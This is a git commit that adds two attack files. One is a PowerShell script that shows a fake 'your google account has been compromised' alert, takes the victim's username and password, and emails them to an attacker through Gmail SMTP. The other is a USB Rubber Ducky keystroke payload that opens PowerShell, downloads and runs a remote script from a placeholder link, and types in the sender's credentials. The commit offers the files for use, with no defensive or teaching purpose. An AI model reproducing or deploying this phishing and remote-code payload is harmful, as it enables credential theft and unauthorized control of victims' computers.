Add files via upload
parent
072fc714a1
commit
7f2d41dab9
|
@ -0,0 +1,13 @@
|
|||
clear
|
||||
$mycredentials = Get-Credential
|
||||
Write-Host "ALERT your google account has been compromised! please enter your credentials for verification"
|
||||
|
||||
$name = Read-Host "Username/Email"
|
||||
$pwd = Read-Host "password"
|
||||
|
||||
|
||||
|
||||
|
||||
Send-MailMessage -SmtpServer smtp.gmail.com -Port 587 -UseSsl -From sendingemailhere -To receiveemailhere -Subject 'Hello from the ducky' -Body ("$name $pwd") -Credential ($mycredentials)
|
||||
exit
|
||||
|
|
@ -0,0 +1,24 @@
|
|||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w maximized
|
||||
ENTER
|
||||
DELAY 200
|
||||
REM now we read in the script as a scriptblock
|
||||
STRING $script = [scriptblock]::Create((New-Object Net.WebClient).DownloadString('LINK HERE'));
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 2000
|
||||
STRING Invoke-Command -ScriptBlock $script
|
||||
DELAY 500
|
||||
ENTER
|
||||
REM enter credentials for "Get-Credential" powershell module
|
||||
DELAY 500
|
||||
STRING firsthalfofemail
|
||||
SHIFT 2
|
||||
STRING gmail.com
|
||||
DELAY 500
|
||||
TAB
|
||||
STRING PASSWORD
|
||||
DELAY 500
|
||||
ENTER
|
Loading…
Reference in New Issue